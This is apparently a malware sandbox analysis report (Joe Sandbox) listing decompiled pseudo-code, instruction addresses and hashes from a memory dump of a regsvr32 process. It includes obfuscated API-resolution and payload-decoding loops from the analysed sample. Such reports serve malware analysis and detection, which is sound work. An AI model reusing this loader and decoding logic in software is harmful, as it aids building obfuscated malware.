					_push(0);
					 *_t474 = _t450;
					 *(_t359 + 0x4357e6) = _t330;
					if( *(_t359 + 0x435998) == 0) {
						if( *(_t359 + 0x435851) == 0) {
							_t332 =  *((intOrPtr*)(_t359 + 0x4410a0))(0,  *((intOrPtr*)(_t359 + 0x435528)),  *((intOrPtr*)(_t359 + 0x43551c)), 0xd, 0x1e0, 0x194,  *((intOrPtr*)(_t359 + 0x435629)));
							 *(_t359 + 0x435851) =  *(_t359 + 0x435851) & 0x00000000;
							 *(_t359 + 0x435851) =  *(_t359 + 0x435851) ^ _t360 ^  *_t474 ^ _t332;
							_t360 = _t360;
						}
						_t330 =  *((intOrPtr*)(_t359 + 0x44105c))();
						_v36 = _t381;
						 *(_t359 + 0x435998) =  *(_t359 + 0x435998) & 0x00000000;
						 *(_t359 + 0x435998) =  *(_t359 + 0x435998) | _t381 & 0x00000000 | _t330;
					}
					if( *(_t359 + 0x4356d1) == 0) {
						_t331 =  *((intOrPtr*)(_t359 + 0x4410a0))( *((intOrPtr*)(_t359 + 0x435501)), 2,  *((intOrPtr*)(_t359 + 0x43569d)),  *((intOrPtr*)(_t359 + 0x4351d7)), 0xa1,  *((intOrPtr*)(_t359 + 0x43544e)), 0x20);
						_v36 = _t360;
						 *(_t359 + 0x4356d1) =  *(_t359 + 0x4356d1) & 0x00000000;
						 *(_t359 + 0x4356d1) =  *(_t359 + 0x4356d1) | _t360 & 0x00000000 ^ _t331;
						return _t331;
					}
					return _t330;
				}
			}

0x00191c5d
0x00191c5d
0x00191c5d
0x00191c5e
0x00191c60
0x00191c63
0x00191c64
0x00191c6c
0x00191c6e
0x00191c71
0x00191c74
0x00191c77
0x00191c7a
0x00191c81
0x00191c83
0x00191c8a
0x00191c91
0x00191c91
0x00191c9c
0x00191e23
0x00192023
0x00192030
0x00192038
0x0019203e
0x00192046
0x0019204d
0x00192053
0x00192053
0x0019205d
0x0019205f
0x00192065
0x0019206d
0x00192074
0x0019207a
0x00192084
0x0019208a
0x00192090
0x00192097
0x0019209d
0x0019209d
0x00192084
0x001920a0
0x001920ae
0x001920b0
0x001920bd
0x001920c5
0x001920cb
0x001920d3
0x001920da
0x001920e0
0x001920e0
0x001920e3
0x001920ef
0x001920f6
0x001920fc
0x001920fc
0x001920fd
0x0019210b
0x0019210d
0x00192119
0x00192120
0x00192126
0x00192126
0x0019212e
0x0019213b
0x00192143
0x00192149
0x00192151
0x00192158
0x0019215e
0x0019215e
0x00192161
0x0019216e
0x00192171
0x00192177
0x0019217f
0x00192186
0x0019218c
0x00192195
0x00192198
0x00192198
0x001921a1
0x001921a8
0x001921ae
0x001921b6
0x001921bc
0x001921c8
0x001921cf
0x001921d5
0x001921d5
0x001921b6
0x001921d6
0x001921e4
0x001921e6
0x001921ec
0x001921f4
0x001921fb
0x00192201
0x00192201
0x001921e4
0x00191e29
0x00191e30
0x00191e3a
0x00191e40
0x00191e47
0x00191e4d
0x00191e4d
0x00191e50
0x00191e5e
0x00191e60
0x00191e66
0x00191e6e
0x00191e75
0x00191e7b
0x00191e7b
0x00191e85
0x00191e87
0x00191e87
0x00191e94
0x00191e9d
0x00191ea3
0x00191eaa
0x00191eb0
0x00191eb9
0x00191ebc
0x00191ebc
0x00191ec0
0x00191ecc
0x00191ed3
0x00191ed9
0x00191ed9
0x00191eda
0x00191ee8
0x00191eea
0x00191ef1
0x00191efd
0x00191f04
0x00191f0a
0x00191f0a
0x00191f12
0x00191f1b
0x00191f23
0x00191f2f
0x00191f36
0x00191f3c
0x00191f3c
0x00191f43
0x00191f4b
0x00191f52
0x00191f58
0x00191f58
0x00191f59
0x00191f67
0x00191f69
0x00191f75
0x00191f7c
0x00191f82
0x00191f82
0x00191f8a
0x00191f90
0x00191f9d
0x00191fa0
0x00191fa6
0x00191fae
0x00191fb5
0x00191fbb
0x00191fc0
0x00191fc3
0x00191fc3
0x00191fc6
0x00191fcd
0x00191fd3
0x00191fdd
0x00192004
0x0019200a
0x00192011
0x00192017
0x00192017
0x00191fdd
0x0019201a
0x00192205
0x00192208
0x00192210
0x00192234
0x0019223c
0x00192243
0x00192249
0x00192253
0x00192253
0x00192256
0x00192262
0x00192264
0x00192267
0x00192267
0x00192271
0x00192286
0x0019228c
0x00192294
0x0019229b
0x001922a1
0x001922ad
0x001922c5
0x001922c6
0x001922c9
0x001922cc
0x001922d2
0x001922db
0x001922e4
0x001922ea
0x001922f2
0x001922f9
0x001922ff
0x001922ff
0x00192302
0x0019230e
0x00192315
0x0019231b
0x0019231e
0x00192321
0x00192321
0x0019232a
0x0019232d
0x0019232e
0x00192336
0x0019233a
0x0019233d
0x00192347
0x00192349
0x0019234f
0x00192356
0x0019235c
0x00192369
0x0019236b
0x00192375
0x00192377
0x0019237f
0x00192388
0x0019238e
0x00192395
0x0019239b
0x0019239b
0x0019239e
0x0019239f
0x001923a0
0x001923a2
0x001923ab
0x001923af
0x001923b1
0x001923b2
0x001923be
0x001923c3
0x001923c3
0x001923c7
0x001923d5
0x001923d8
0x001923da
0x001923dc
0x001923dd
0x001923df
0x001923e1
0x001923e2
0x001923e2
0x001923e2
0x001923e9
0x001923ec
0x001923f6
0x001923f8
0x00192400
0x00192407
0x0019240d
0x0019240d
0x0019240e
0x0019241c
0x00192420
0x00192427
0x00191ca2
0x00191ca8
0x00191cab
0x00191cbc
0x00191cc2
0x00191cc4
0x00191ccb
0x00191cd9
0x00191ce2
0x00191d04
0x00191d10
0x00191d17
0x00191d1d
0x00191d1d
0x00191d1e
0x00191d24
0x00191d2c
0x00191d33
0x00191d39
0x00191d44
0x00191d67
0x00191d6d
0x00191d75
0x00191d7c
0x00000000
0x00191d82
0x00191d85
0x00191d85

Strings

U, xrefs: 001920FD

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 549d6ae3d9d3b009460b0904d1c15cf0bb4ee64f365c2683f7c08c4a584efb00
Instruction ID: 6002d50ee074c845ae7e72559e3ecef794cf817bc4532e33a8d4ac9bbf45cda2
Opcode Fuzzy Hash: 549d6ae3d9d3b009460b0904d1c15cf0bb4ee64f365c2683f7c08c4a584efb00
Instruction Fuzzy Hash: 91324C72800618DFEF149FA0C88979A7BB1FF68315F0891A9DD0DAE199C77815A4CF78

Uniqueness

Uniqueness Score: -1.00%

Function 00191D89, Relevance: 1.6, Strings: 1, Instructions: 344
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00191D89(signed int __eax, void* __ecx, signed int __edx, intOrPtr* __edi, signed int __esi) {
				signed int _t281;
				signed int _t283;
				void _t284;
				void* _t286;
				intOrPtr _t287;
				signed int _t291;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t309;
				signed int _t311;
				void* _t318;
				void* _t321;
				signed int _t324;
				void* _t327;
				signed int _t331;
				void* _t337;
				signed int _t353;
				void* _t354;
				signed int _t355;
				signed char _t358;
				intOrPtr* _t376;
				void* _t379;
				signed int _t382;
				void* _t384;
				signed int _t398;
				signed int _t400;
				void* _t401;
				signed int _t423;
				signed int* _t439;
				signed int* _t440;
				signed int* _t443;

				_t398 = __esi;
				_t376 = __edi;
				_t353 = __edx;
				_t337 = __ecx;
				_t280 = __eax;
				 *__edi =  *__edi + __ecx;
				 *0x43974500 =  *((intOrPtr*)(0x43974500)) + __eax;
				 *__eax =  *__eax + __eax;
				if( *__eax == 0) {
					_push(__eax);
					_push(1);
					_t311 =  *0x008766E9();
					 *_t439 = _t423;
					 *0x0086AA33 = 0 ^ _t311;
					_t423 = 0;
					_t280 = _t311 & 0x00000000 |  *_t439;
					_t439 =  &(_t439[1]);
				}
				_t281 =  *0x008766EC();
				if( *0x0086AF9C == 0) {
					_push(_t281);
					_push(0x86af84);
					_t309 =  *((intOrPtr*)(0x8766ec))();
					 *(_t423 - 0x20) = _t398;
					 *0x0086AF9C =  *0x0086AF9C & 0x00000000;
					 *0x0086AF9C =  *0x0086AF9C | _t398 ^  *(_t423 - 0x20) ^ _t309;
					_t398 =  *(_t423 - 0x20);
					_pop( *_t19);
					_t281 = _t309 & 0x00000000 |  *(_t423 - 0x1c);
				}
				 *0x0086ACDD =  *0x0086ACDD & 0x00000000;
				 *0x0086ACDD =  *0x0086ACDD | _t376 -  *_t439 ^ _t281;
				_t379 = _t376;
				if( *((intOrPtr*)(_t423 - 0xc)) != 2) {
					if( *((intOrPtr*)(_t423 - 0xc)) == 4) {
						if( *0x0086AC75 == 0) {
							_push( *0x0086B008);
							_t281 =  *0x00876708();
							 *(_t423 - 0x20) = _t337;
							 *0x0086AC75 =  *0x0086AC75 & 0x00000000;
							 *0x0086AC75 =  *0x0086AC75 | _t337 -  *(_t423 - 0x20) | _t281;
							_t337 =  *(_t423 - 0x20);
						}
						if( *0x0086ACED == 0) {
							_t281 =  *0x008766F0();
							 *(_t423 - 0x20) = _t337;
							 *0x0086ACED =  *0x0086ACED & 0x00000000;
							 *0x0086ACED =  *0x0086ACED ^ _t337 & 0x00000000 ^ _t281;
							_t337 =  *(_t423 - 0x20);
							if( *0x0086AA9E == 0) {
								_push(8);
								_push(0);
								_t281 =  *0x00876740();
								 *(_t423 - 0x20) = _t398;
								 *0x0086AA9E = _t281;
								_t398 =  *(_t423 - 0x20);
							}
						}
						 *(_t423 - 0x14) = 1;
						if( *0x0086AA8E == 0) {
							_push( *0x0086ACC5);
							if( *0x0086A853 == 0) {
								_push( *0x0086ACB1);
								_t300 =  *((intOrPtr*)(0x876708))();
								 *(_t423 - 0x20) = _t398;
								 *0x0086A853 =  *0x0086A853 & 0x00000000;
								 *0x0086A853 =  *0x0086A853 ^ (_t398 ^  *(_t423 - 0x20) | _t300);
								_t398 =  *(_t423 - 0x20);
							}
							_t281 =  *0x0087673C();
							 *0x0086AA8E =  *0x0086AA8E & 0x00000000;
							 *0x0086AA8E =  *0x0086AA8E ^ _t423 ^  *_t439 ^ _t281;
							_t423 = _t423;
						}
						 *(_t423 - 4) = 0x55;
						if( *0x0086AA2A == 0) {
							_t281 =  *0x008766F8();
							 *0x0086AA2A =  *0x0086AA2A & 0x00000000;
							 *0x0086AA2A =  *0x0086AA2A | _t353 & 0x00000000 | _t281;
							_t353 = _t353;
						}
						if( *0x0086B0CD == 0) {
							if( *0x0086A8F0 == 0) {
								_push( *0x0086A953);
								_t299 =  *((intOrPtr*)(0x876708))();
								 *(_t423 - 0x20) = _t398;
								 *0x0086A8F0 =  *0x0086A8F0 & 0x00000000;
								 *0x0086A8F0 =  *0x0086A8F0 | _t398 -  *(_t423 - 0x20) | _t299;
								_t398 =  *(_t423 - 0x20);
							}
							_t281 =  *((intOrPtr*)(0x8766f0))();
							if( *0x0086AF44 == 0) {
								_push(_t281);
								_t297 =  *((intOrPtr*)(0x8766f0))();
								 *(_t423 - 0x20) = _t398;
								 *0x0086AF44 =  *0x0086AF44 & 0x00000000;
								 *0x0086AF44 =  *0x0086AF44 | _t398 -  *(_t423 - 0x20) | _t297;
								_t398 =  *(_t423 - 0x20);
								_t281 =  *_t439;
								_t439 =  &(_t439[1]);
							}
							 *0x0086B0CD =  *0x0086B0CD & 0x00000000;
							 *0x0086B0CD =  *0x0086B0CD | _t353 -  *_t439 ^ _t281;
							_t353 = _t353;
							if( *0x0086AFC0 == 0) {
								_push(9);
								_push(0);
								_t281 =  *((intOrPtr*)(0x876740))();
								 *0x0086AFC0 =  *0x0086AFC0 & 0x00000000;
								 *0x0086AFC0 =  *0x0086AFC0 | _t379 -  *_t439 ^ _t281;
								_t379 = _t379;
							}
						}
						 *(_t423 - 8) = 2;
						if( *0x0086AE56 == 0) {
							_t281 =  *0x008766F4();
							 *(_t423 - 0x20) = _t398;
							 *0x0086AE56 =  *0x0086AE56 & 0x00000000;
							 *0x0086AE56 =  *0x0086AE56 ^ (_t398 & 0x00000000 | _t281);
							_t398 =  *(_t423 - 0x20);
						}
					}
					goto L49;
				} else {
					if( *0x0086A9EE == 0) {
						_push( *0x0086AFA8);
						_push(0);
						_t281 =  *((intOrPtr*)(0x876740))();
						 *(_t423 - 0x1c) = _t353;
						 *0x0086A9EE = 0 ^ _t281;
						_t353 =  *(_t423 - 0x1c);
					}
					 *(_t423 - 0x14) = 3;
					if( *0x0086A9A7 == 0) {
						_t281 =  *((intOrPtr*)(0x8766f8))();
						 *(_t423 - 0x20) = _t398;
						 *0x0086A9A7 =  *0x0086A9A7 & 0x00000000;
						 *0x0086A9A7 =  *0x0086A9A7 | _t398 & 0x00000000 | _t281;
						_t398 =  *(_t423 - 0x20);
					}
					if( *0x0086A96B == 0) {
						_t305 = 0x86aa42;
						if( *0x0086AEA2 == 0) {
							_push(_t305);
							_push( *0x0086AD61);
							_t306 =  *((intOrPtr*)(0x87673c))();
							 *(_t423 - 0x1c) = _t398;
							 *0x0086AEA2 = 0 ^ _t306;
							_t398 =  *(_t423 - 0x1c);
							_t305 =  *_t439;
							_t439 = _t439 - 0xfffffffc;
						}
						_push(_t305);
						_t281 =  *0x008766FC();
						 *0x0086A96B =  *0x0086A96B & 0x00000000;
						 *0x0086A96B =  *0x0086A96B ^ (_t353 & 0x00000000 | _t281);
						_t353 = _t353;
					}
					 *(_t423 - 4) = 0x11;
					if( *0x0086AC45 == 0) {
						_push(0x86af34);
						_t281 =  *0x00876700();
						 *0x0086AC45 =  *0x0086AC45 & 0x00000000;
						 *0x0086AC45 =  *0x0086AC45 | _t337 & 0x00000000 ^ _t281;
						_t337 = _t337;
					}
					if( *0x0086AB16 == 0) {
						if( *0x0086AF40 == 0) {
							_push( *0x0086A6D0);
							_t303 =  *((intOrPtr*)(0x87673c))();
							 *0x0086AF40 =  *0x0086AF40 & 0x00000000;
							 *0x0086AF40 =  *0x0086AF40 | _t353 & 0x00000000 ^ _t303;
							_t353 = _t353;
						}
						_push( *0x0086ADE2);
						_t281 =  *((intOrPtr*)(0x87673c))();
						 *_t439 = _t423;
						 *0x0086AB16 = 0 ^ _t281;
						_t423 = 0;
					}
					 *(_t423 - 8) = 4;
					if( *0x0086A764 == 0) {
						_t281 =  *((intOrPtr*)(0x8766f0))();
						 *0x0086A764 =  *0x0086A764 & 0x00000000;
						 *0x0086A764 =  *0x0086A764 ^ _t423 & 0x00000000 ^ _t281;
						_t423 = _t423;
					}
					if( *0x0086A740 == 0) {
						_t281 =  *((intOrPtr*)(0x8766f0))();
						if( *0x0086A9AB == 0) {
							_push(_t281);
							_t301 =  *((intOrPtr*)(0x8766f8))();
							 *(_t423 - 0x1c) = _t398;
							 *0x0086A9AB =  *0x0086A9AB & 0x00000000;
							 *0x0086A9AB =  *0x0086A9AB | _t398 & 0x00000000 ^ _t301;
							_t398 =  *(_t423 - 0x1c);
							_t281 =  *_t439;
							_t439 = _t439 - 0xfffffffc;
						}
						 *(_t423 - 0x1c) = _t379;
						 *0x0086A740 = _t281;
						_t379 =  *(_t423 - 0x1c);
						if( *0x0086AF1C == 0) {
							_push(0x1000);
							_push(0x4b);
							_push( *0x0086ABE1);
							_push( *0x0086A6D4);
							_push( *0x0086AAAE);
							_push( *0x0086AC2D);
							_push( *0x0086AC59);
							_t281 =  *0x00876738();
							 *(_t423 - 0x1c) = _t379;
							 *0x0086AF1C = _t281;
							_t379 =  *(_t423 - 0x1c);
						}
					}
					L49:
					 *_t439 =  *_t439 ^ _t353;
					_t354 = _t353;
					if( *0x0086B0D1 == 0) {
						_push(_t354);
						_push( *0x0086A7B2);
						_push( *0x0086AEB9);
						_push(0x12e);
						_push(0x3d);
						_push( *0x0086AE72);
						_push(2);
						_push( *0x0086AFE8);
						_t281 =  *((intOrPtr*)(0x876738))();
						 *_t439 = _t423;
						 *0x0086B0D1 = 0 ^ _t281;
						_t423 = 0;
						_t439 = _t439 - 0xfffffffc;
					}
					 *(_t423 - 0x20) = 0x435698;
					_t283 = _t281 & 0x00000000 | 0x435698 ^  *(_t423 - 0x20) ^  *(_t423 - 0x10);
					_t318 =  *(_t423 - 0x20);
					_t284 = _t283 /  *(_t423 - 8);
					_t355 = _t283 %  *(_t423 - 8);
					if( *(_t318 + 0x435651) == 0) {
						_t291 =  *((intOrPtr*)(_t318 + 0x441044))(_t318 + 0x435544, _t318 + 0x435243, _t355);
						 *(_t423 - 0x1c) = _t337;
						 *(_t318 + 0x435167) =  *(_t318 + 0x435167) & 0x00000000;
						 *(_t318 + 0x435167) =  *(_t318 + 0x435167) ^ (_t337 -  *(_t423 - 0x1c) | _t291);
						_t337 =  *(_t423 - 0x1c);
						_t443 = _t439 - 0xfffffffc;
						_push( *((intOrPtr*)(_t318 + 0x441044))(_t318 + 0x435352, _t318 + 0x435685,  *_t439));
						_pop( *_t223);
						_push( *(_t423 - 0x20));
						_pop( *_t225);
						_push(0);
						if( *(_t318 + 0x4351fb) == 0) {
							_t296 =  *((intOrPtr*)(_t318 + 0x441064))(_t318 + 0x43568a);
							 *(_t423 - 0x20) = _t398;
							 *(_t318 + 0x4351fb) =  *(_t318 + 0x4351fb) & 0x00000000;
							 *(_t318 + 0x4351fb) =  *(_t318 + 0x4351fb) ^ (_t398 & 0x00000000 | _t296);
							_t398 =  *(_t423 - 0x20);
						}
						_t284 =  *((intOrPtr*)(_t318 + 0x441070))();
						 *(_t318 + 0x435651) =  *(_t318 + 0x435651) & 0x00000000;
						 *(_t318 + 0x435651) =  *(_t318 + 0x435651) | _t423 & 0x00000000 | _t284;
						_t423 = _t423;
						_t355 = 0 ^  *_t443;
						_t439 =  &(_t443[1]);
					}
					 *(_t423 - 0x10) =  *(_t423 - 0x10) - _t355;
					_t321 = _t318;
					 *(_t423 - 0x1c) = _t379;
					 *(_t423 - 0x18) =  *(_t423 - 0x18) & 0x00000000;
					 *(_t423 - 0x18) =  *(_t423 - 0x18) | _t379 -  *(_t423 - 0x1c) ^ _t355;
					_t382 =  *(_t423 - 0x1c);
					if( *(_t321 + 0x4355a9) == 0) {
						_t284 =  *((intOrPtr*)(_t321 + 0x441060))();
						 *(_t423 - 0x1c) = _t337;
						 *(_t321 + 0x4355a9) = 0 ^ _t284;
					}
					_t400 = _t398 & 0x00000000 | _t321 -  *_t439 |  *(_t423 + 8);
					_t324 = _t321;
					_t384 = _t382 & 0x00000000 ^ (_t355 -  *_t439 | _t400);
					_t358 = _t355;
					if( *(_t324 + 0x435492) == 0) {
						_t284 =  *((intOrPtr*)(_t324 + 0x441054))(_t324 + 0x435482);
						 *(_t423 - 0x20) = _t384;
						 *(_t324 + 0x435492) = 0 ^ _t284;
						_t384 =  *(_t423 - 0x20);
					}
					_t401 = _t400 - 1;
					_push(_t324);
					do {
						 *_t439 = _t324;
						_t327 = 0;
						if(((0 ^ _t384) &  *(_t423 - 0x14)) == 0) {
							_t401 = _t401 + 1;
							 *(_t423 - 0x20) = _t327;
							_t284 = _t284 & 0x00000000 | _t327 & 0x00000000 |  *(_t423 - 8);
							_t327 =  *(_t284 + _t401) & 0x000000ff;
						}
						 *(_t423 - 0x1c) = _t327;
						_t324 =  *(_t423 - 0x1c);
						asm("rol edx, cl");
						_t358 = (_t358 & 0x00000000 ^ _t327 -  *(_t423 - 0x1c) ^  *(_t423 - 4)) & _t324;
						asm("lodsb");
						_t284 = _t284 | _t358;
						 *_t384 = _t284;
						_t384 = _t384 + 1;
						_t270 = _t423 - 0x10;
						 *_t270 =  *(_t423 - 0x10) - 1;
					} while ( *_t270 != 0);
					_t331 =  *_t439;
					_t440 = _t439 - 0xfffffffc;
					if( *((intOrPtr*)(_t331 + 0x435254)) == 0) {
						_t287 =  *((intOrPtr*)(_t331 + 0x44105c))();
						 *_t440 = _t423;
						 *((intOrPtr*)(_t331 + 0x435254)) = _t287;
						_t423 = 0;
					}
					 *(_t423 - 0x1c) = _t384;
					_t286 = memcpy( *(_t423 - 0x1c), _t401 + 1, 0 ^  *(_t423 - 0x18));
					_pop( *_t278);
					return _t286;
				}
			}

0x00191d89
0x00191d89
0x00191d89
0x00191d89
0x00191d89
0x00191d8e
0x00191d9a
0x00191da0
0x00191da2
0x00191da4
0x00191da5
0x00191da7
0x00191daf
0x00191db6
0x00191dbc
0x00191dc3
0x00191dc6
0x00191dc6
0x00191dca
0x00191dd7
0x00191dd9
0x00191de0
0x00191de1
0x00191de7
0x00191def
0x00191df6
0x00191dfc
0x00191e05
0x00191e08
0x00191e08
0x00191e11
0x00191e18
0x00191e1e
0x00191e23
0x00192023
0x00192030
0x00192032
0x00192038
0x0019203e
0x00192046
0x0019204d
0x00192053
0x00192053
0x0019205d
0x0019205f
0x00192065
0x0019206d
0x00192074
0x0019207a
0x00192084
0x00192086
0x00192088
0x0019208a
0x00192090
0x00192097
0x0019209d
0x0019209d
0x00192084
0x001920a0
0x001920ae
0x001920b0
0x001920bd
0x001920bf
0x001920c5
0x001920cb
0x001920d3
0x001920da
0x001920e0
0x001920e0
0x001920e3
0x001920ef
0x001920f6
0x001920fc
0x001920fc
0x001920fd
0x0019210b
0x0019210d
0x00192119
0x00192120
0x00192126
0x00192126
0x0019212e
0x0019213b
0x0019213d
0x00192143
0x00192149
0x00192151
0x00192158
0x0019215e
0x0019215e
0x00192161
0x0019216e
0x00192170
0x00192171
0x00192177
0x0019217f
0x00192186
0x0019218c
0x00192195
0x00192198
0x00192198
0x001921a1
0x001921a8
0x001921ae
0x001921b6
0x001921b8
0x001921ba
0x001921bc
0x001921c8
0x001921cf
0x001921d5
0x001921d5
0x001921b6
0x001921d6
0x001921e4
0x001921e6
0x001921ec
0x001921f4
0x001921fb
0x00192201
0x00192201
0x001921e4
0x00000000
0x00191e29
0x00191e30
0x00191e32
0x00191e38
0x00191e3a
0x00191e40
0x00191e47
0x00191e4d
0x00191e4d
0x00191e50
0x00191e5e
0x00191e60
0x00191e66
0x00191e6e
0x00191e75
0x00191e7b
0x00191e7b
0x00191e85
0x00191e87
0x00191e94
0x00191e96
0x00191e97
0x00191e9d
0x00191ea3
0x00191eaa
0x00191eb0
0x00191eb9
0x00191ebc
0x00191ebc
0x00191ebf
0x00191ec0
0x00191ecc
0x00191ed3
0x00191ed9
0x00191ed9
0x00191eda
0x00191ee8
0x00191ef0
0x00191ef1
0x00191efd
0x00191f04
0x00191f0a
0x00191f0a
0x00191f12
0x00191f1b
0x00191f1d
0x00191f23
0x00191f2f
0x00191f36
0x00191f3c
0x00191f3c
0x00191f3d
0x00191f43
0x00191f4b
0x00191f52
0x00191f58
0x00191f58
0x00191f59
0x00191f67
0x00191f69
0x00191f75
0x00191f7c
0x00191f82
0x00191f82
0x00191f8a
0x00191f90
0x00191f9d
0x00191f9f
0x00191fa0
0x00191fa6
0x00191fae
0x00191fb5
0x00191fbb
0x00191fc0
0x00191fc3
0x00191fc3
0x00191fc6
0x00191fcd
0x00191fd3
0x00191fdd
0x00191fdf
0x00191fe4
0x00191fe6
0x00191fec
0x00191ff2
0x00191ff8
0x00191ffe
0x00192004
0x0019200a
0x00192011
0x00192017
0x00192017
0x00191fdd
0x00192204
0x00192205
0x00192208
0x00192210
0x00192212
0x00192213
0x00192219
0x0019221f
0x00192224
0x00192226
0x0019222c
0x0019222e
0x00192234
0x0019223c
0x00192243
0x00192249
0x00192253
0x00192253
0x00192256
0x00192262
0x00192264
0x00192267
0x00192267
0x00192271
0x00192286
0x0019228c
0x00192294
0x0019229b
0x001922a1
0x001922ad
0x001922c5
0x001922c6
0x001922c9
0x001922cc
0x001922d2
0x001922db
0x001922e4
0x001922ea
0x001922f2
0x001922f9
0x001922ff
0x001922ff
0x00192302
0x0019230e
0x00192315
0x0019231b
0x0019231e
0x00192321
0x00192321
0x0019232a
0x0019232d
0x0019232e
0x00192336
0x0019233a
0x0019233d
0x00192347
0x00192349
0x0019234f
0x00192356
0x0019235c
0x00192369
0x0019236b
0x00192375
0x00192377
0x0019237f
0x00192388
0x0019238e
0x00192395
0x0019239b
0x0019239b
0x0019239e
0x0019239f
0x001923a0
0x001923a2
0x001923ab
0x001923af
0x001923b1
0x001923b2
0x001923be
0x001923c3
0x001923c3
0x001923c7
0x001923d5
0x001923d8
0x001923da
0x001923dc
0x001923dd
0x001923df
0x001923e1
0x001923e2
0x001923e2
0x001923e2
0x001923e9
0x001923ec
0x001923f6
0x001923f8
0x00192400
0x00192407
0x0019240d
0x0019240d
0x0019240e
0x0019241c
0x00192420
0x00192427
0x00192427

Strings

EVC, xrefs: 00191D89

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID: EVC
API String ID: 0-2317647041
Opcode ID: d630a207991558a04c9b35e2ebf4bac3101f74f6a982d320bbdcea0694b17e6c
Instruction ID: 4040785cac2f8e06af4d650afbbbbc98cdbb0c11d82d3c1cffcd59089639f78f
Opcode Fuzzy Hash: d630a207991558a04c9b35e2ebf4bac3101f74f6a982d320bbdcea0694b17e6c
Instruction Fuzzy Hash: CAE15D72C046099FEF04DFA4C98979ABBB1FF64311F0891A9DD0DAE049C77815A48F78

Uniqueness

Uniqueness Score: -1.00%

Function 0019B114, Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45b2c36b56dd65acc4ad6610fefbd032e62ce2ab70fce9b6ac85e506ef420ee
Instruction ID: 9b1d4261e01ea6610c575b0134eba5985156301174fa142500f4415e0e400a37
Opcode Fuzzy Hash: d45b2c36b56dd65acc4ad6610fefbd032e62ce2ab70fce9b6ac85e506ef420ee
Instruction Fuzzy Hash: 9802DD6505E7C25ED3078B789C297D2BFB1AF07218F1D02CED4D08E1E3D619409ADB66

Uniqueness

Uniqueness Score: -1.00%

Function 10016EB0, Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x5dc03300
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x55c35dc0
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xfffffe8b
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
